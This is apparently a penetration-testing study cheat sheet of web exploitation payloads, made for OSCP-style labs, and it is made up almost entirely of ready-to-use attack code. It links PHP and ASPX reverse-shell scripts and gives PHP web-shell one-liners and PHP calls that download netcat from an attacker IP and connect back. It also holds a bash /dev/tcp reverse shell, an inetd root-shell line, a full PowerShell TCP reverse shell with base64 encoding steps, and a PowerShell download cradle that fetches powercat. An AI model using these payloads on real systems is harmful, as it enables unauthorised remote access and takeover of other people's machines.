// notes/ Web Exploitation
🕸️
Payloads
{% embed url="<https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/phpreverseshell.php" %}
#web applications#adot8
source · oscp.adot8.com · web-applications/payloads ↗Payloads
{% embed url="https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php" %}
{% embed url="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx" %}
php
01system("powershell -c curl http://10.10.14.6/nc.exe -o C:\\programdata\\nc.exe");02system("C:\\programdata\\nc.exe 10.10.14.6 1337 -e powershell.exe");php
01 02<?php system($_GET['cmd']) ?> 03<?php system($_REQUEST['cmd']) ?> 04<?php echo shell_exec($_GET['cmd']); ?>05<?php echo shell_exec($_REQUEST['cmd']); ?>06 code
01bash -c 'bash -i >& /dev/tcp/192.168.45.204/1337 0>&1'code
01echo '31337 stream tcp nowait root /bin/sh -i'Base64 encoded win
code
01pwshcode
01$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.237",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'code
01$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)02$EncodedText =[Convert]::ToBase64String($Bytes)03$EncodedTextcode
01powershell -e <payload>code
01powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1');powercat -c 192.168.45.173 -p 1337 -e powershell"